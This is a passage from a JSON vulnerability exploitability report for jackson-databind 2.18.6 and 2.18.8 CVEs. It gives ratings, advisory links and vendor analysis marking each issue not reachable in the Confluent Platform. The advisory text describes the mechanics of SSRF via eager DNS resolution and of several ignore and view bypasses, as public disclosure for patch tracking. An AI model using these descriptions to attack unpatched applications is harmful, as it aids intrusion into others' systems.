          "ref": "urn:cdx:7f5b0f1f-2f04-4da8-a834-ed0e9a127639/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#e16a39cc-16c4-44be-811a-60815861e85c"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:ce29a600-32f9-4ae4-989e-52d9c75f55d4/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#79024452-416e-4987-b86c-9d9cd4c10910"
        },
        {
          "ref": "urn:cdx:82acba58-7e67-475b-bbb0-774b260bff77/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#cee8583a-1057-4ccd-baa1-21e9669a2ffa"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#806bad17-7a38-452a-a9a3-5e61cfa3d662"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#dbee5ff7-f091-4f9f-a244-f0fc96ad4c03"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#e752ec06-9a0c-4b21-ab43-417da928c6cf"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#be7de3d3-15cd-4e75-a8d2-0b1fb6379f51"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#e4128cc9-eff7-44a3-9d2c-28b1dfd7f8b2"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#da9d90d8-4f83-439b-939a-4a6405ba0813"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#ffcbfbb0-e189-4cae-8b77-240147c45069"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#ea4a475d-7b42-4b65-9d76-44cc5ff33192"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#f7e481bb-7d36-42c7-85e2-3c06a3786f2c"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#e43ff7fe-9523-4928-af5d-3dd2e82f0031"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#9dc1c36c-49a5-4d1c-bdd3-be2f7d9426ef"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#e59f9146-a8e6-48a7-8afa-0d114ecfab19"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#e2bab1c2-1928-4a58-a9e9-58661f512bf3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. the product does not enable class-based polymorphic deserialization (default typing, or @JsonTypeInfo with Id.CLASS/Id.MINIMAL_CLASS) on untrusted input, so the array-subtype PolymorphicTypeValidator bypass is not reachable."
      }
    },
    {
      "id": "CVE-2026-54514",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        }
      ],
      "cwes": [
        918
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.0.0 until 2.18.8, 2.21.4, and 3.1.4, JDKFromStringDeserializer constructed InetSocketAddress with new InetSocketAddress(host, port), which performs eager DNS name resolution for hostname inputs at deserialization time. An application that binds untrusted JSON into a type containing an InetSocketAddress field issues an attacker-chosen DNS query during readValue, before any application-level validation or connect logic. The fix uses InetSocketAddress.createUnresolved(host, port), deferring DNS to an explicit connect. This vulnerability is fixed in 2.18.8, 2.21.4, and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.18.8, 2.21.4, 3.1.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54514"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54514"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/1f5a1037b1e9e05920e755cb35f198bcd46667e4"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/5951"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-hgj6-7826-r7m5"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54514"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54514"
        }
      ],
      "published": "2026-06-23T21:17:02+00:00",
      "updated": "2026-06-27T20:55:09+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:9b068e1a-8bb7-460d-a898-b38a7bd09e06/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:7f5b0f1f-2f04-4da8-a834-ed0e9a127639/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#e16a39cc-16c4-44be-811a-60815861e85c"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:ce29a600-32f9-4ae4-989e-52d9c75f55d4/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#79024452-416e-4987-b86c-9d9cd4c10910"
        },
        {
          "ref": "urn:cdx:82acba58-7e67-475b-bbb0-774b260bff77/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#cee8583a-1057-4ccd-baa1-21e9669a2ffa"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#806bad17-7a38-452a-a9a3-5e61cfa3d662"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#dbee5ff7-f091-4f9f-a244-f0fc96ad4c03"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#e752ec06-9a0c-4b21-ab43-417da928c6cf"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#be7de3d3-15cd-4e75-a8d2-0b1fb6379f51"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#e4128cc9-eff7-44a3-9d2c-28b1dfd7f8b2"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#da9d90d8-4f83-439b-939a-4a6405ba0813"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#ffcbfbb0-e189-4cae-8b77-240147c45069"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#ea4a475d-7b42-4b65-9d76-44cc5ff33192"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#f7e481bb-7d36-42c7-85e2-3c06a3786f2c"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#e43ff7fe-9523-4928-af5d-3dd2e82f0031"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#9dc1c36c-49a5-4d1c-bdd3-be2f7d9426ef"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#e59f9146-a8e6-48a7-8afa-0d114ecfab19"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#e2bab1c2-1928-4a58-a9e9-58661f512bf3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. no attacker-controlled JSON is deserialized into a java.net.InetSocketAddress (the type appears only in networking code, not bound via jackson), so the eager-DNS-resolution SSRF path is not reachable."
      }
    },
    {
      "id": "CVE-2026-54515",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        915
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.8.0 until 2.18.9, 2.21.5, and 3.1.4, in BeanDeserializerBase.createContextual(), per-property @JsonIgnoreProperties exclusions are applied by _handleByNameInclusion(), producing a contextual deserializer whose BeanPropertyMap has the ignored properties removed. The subsequent per-property case-insensitivity block (triggered by @JsonFormat(ACCEPT_CASE_INSENSITIVE_PROPERTIES)) rebuilds from this._beanProperties (the original, unfiltered map) instead of contextual._beanProperties, then overwrites the filtered map \u2014 restoring every property _handleByNameInclusion had just removed. The ignored property becomes writable again. This vulnerability is fixed in 2.18.9, 2.21.5, and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 3.1.4, 2.18.9, 2.21.5, 2.22.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54515"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54515"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/0e1b0b211f7a53baa62ba2f4c9bd006c7bf4d5fa"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/5962"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/5964"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-5jmj-h7xm-6q6v"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54515"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54515"
        }
      ],
      "published": "2026-06-23T21:17:02+00:00",
      "updated": "2026-06-29T13:38:59+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.8",
          "versions": [
            {
              "version": "2.18.8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:9b068e1a-8bb7-460d-a898-b38a7bd09e06/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:7f5b0f1f-2f04-4da8-a834-ed0e9a127639/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:e02dd261-cd8f-4913-980a-9e4efbca1fa6/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.8"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#e16a39cc-16c4-44be-811a-60815861e85c"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:ce29a600-32f9-4ae4-989e-52d9c75f55d4/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#79024452-416e-4987-b86c-9d9cd4c10910"
        },
        {
          "ref": "urn:cdx:82acba58-7e67-475b-bbb0-774b260bff77/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#cee8583a-1057-4ccd-baa1-21e9669a2ffa"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#806bad17-7a38-452a-a9a3-5e61cfa3d662"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#dbee5ff7-f091-4f9f-a244-f0fc96ad4c03"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#e752ec06-9a0c-4b21-ab43-417da928c6cf"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#be7de3d3-15cd-4e75-a8d2-0b1fb6379f51"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#e4128cc9-eff7-44a3-9d2c-28b1dfd7f8b2"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#da9d90d8-4f83-439b-939a-4a6405ba0813"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#ffcbfbb0-e189-4cae-8b77-240147c45069"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#ea4a475d-7b42-4b65-9d76-44cc5ff33192"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#f7e481bb-7d36-42c7-85e2-3c06a3786f2c"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#e43ff7fe-9523-4928-af5d-3dd2e82f0031"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#9dc1c36c-49a5-4d1c-bdd3-be2f7d9426ef"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#e59f9146-a8e6-48a7-8afa-0d114ecfab19"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#e2bab1c2-1928-4a58-a9e9-58661f512bf3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. MapperFeature.ACCEPT_CASE_INSENSITIVE_PROPERTIES is not enabled in the product, so the case-insensitive @JsonIgnoreProperties bypass is not reachable."
      }
    },
    {
      "id": "CVE-2026-59888",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        }
      ],
      "cwes": [
        915
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.15.0 until 2.18.8, 2.21.4, and 3.1.4, Java Records using a PropertyNamingStrategy can bypass @JsonIgnore because POJOPropertiesCollector._removeUnwantedIgnorals() records an ignored component under its original implicit name before _renameUsing() applies the naming strategy, allowing the renamed JSON key to be assigned to the Record constructor parameter. This issue is fixed in versions 2.18.8, 2.21.4, and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.18.8, 2.21.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59888"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59888"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/baa2cdf5ca2b2717fbb88d91955d69d8651df3e4"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/c7c678360624da5bc7eed2152789fa522880db9d"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/5974"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-3pjw-73gf-8qr5"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59888"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59888"
        }
      ],
      "published": "2026-07-14T17:17:15+00:00",
      "updated": "2026-07-15T20:18:23+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:9b068e1a-8bb7-460d-a898-b38a7bd09e06/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:7f5b0f1f-2f04-4da8-a834-ed0e9a127639/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#e16a39cc-16c4-44be-811a-60815861e85c"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:ce29a600-32f9-4ae4-989e-52d9c75f55d4/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#79024452-416e-4987-b86c-9d9cd4c10910"
        },
        {
          "ref": "urn:cdx:82acba58-7e67-475b-bbb0-774b260bff77/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#cee8583a-1057-4ccd-baa1-21e9669a2ffa"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#806bad17-7a38-452a-a9a3-5e61cfa3d662"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#dbee5ff7-f091-4f9f-a244-f0fc96ad4c03"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#e752ec06-9a0c-4b21-ab43-417da928c6cf"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#be7de3d3-15cd-4e75-a8d2-0b1fb6379f51"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#e4128cc9-eff7-44a3-9d2c-28b1dfd7f8b2"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#da9d90d8-4f83-439b-939a-4a6405ba0813"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#ffcbfbb0-e189-4cae-8b77-240147c45069"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#ea4a475d-7b42-4b65-9d76-44cc5ff33192"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#f7e481bb-7d36-42c7-85e2-3c06a3786f2c"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#e43ff7fe-9523-4928-af5d-3dd2e82f0031"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#9dc1c36c-49a5-4d1c-bdd3-be2f7d9426ef"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#e59f9146-a8e6-48a7-8afa-0d114ecfab19"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#e2bab1c2-1928-4a58-a9e9-58661f512bf3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59889",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        863
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.18.0 until 2.18.9, 2.21.5, 2.22.1, 3.1.5, and 3.2.1, UnwrappedPropertyHandler.processUnwrapped() replays buffered JSON for a @JsonUnwrapped property and calls prop.deserializeAndSet() without a prop.visibleInView(ctxt.getActiveView()) guard, allowing a property annotated with both @JsonView and @JsonUnwrapped to be written from attacker JSON under a less-privileged active view. This issue is fixed in versions 2.18.9, 2.21.5, 2.22.1, 3.1.5, and 3.2.1.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.21.5, 2.18.9, 2.22.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59889"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/d627a8a86fcb062429282f79f3f256f181ed2c7b"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/6060"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/6056"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-5gvw-p9qm-jgwh"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59889"
        }
      ],
      "published": "2026-07-14T21:17:06+00:00",
      "updated": "2026-07-16T16:19:15+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.8",
          "versions": [
            {
              "version": "2.18.8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:9b068e1a-8bb7-460d-a898-b38a7bd09e06/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:7f5b0f1f-2f04-4da8-a834-ed0e9a127639/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:e02dd261-cd8f-4913-980a-9e4efbca1fa6/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.8"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#e16a39cc-16c4-44be-811a-60815861e85c"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:ce29a600-32f9-4ae4-989e-52d9c75f55d4/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#79024452-416e-4987-b86c-9d9cd4c10910"
        },
        {
          "ref": "urn:cdx:82acba58-7e67-475b-bbb0-774b260bff77/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#cee8583a-1057-4ccd-baa1-21e9669a2ffa"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#806bad17-7a38-452a-a9a3-5e61cfa3d662"
        },
        {
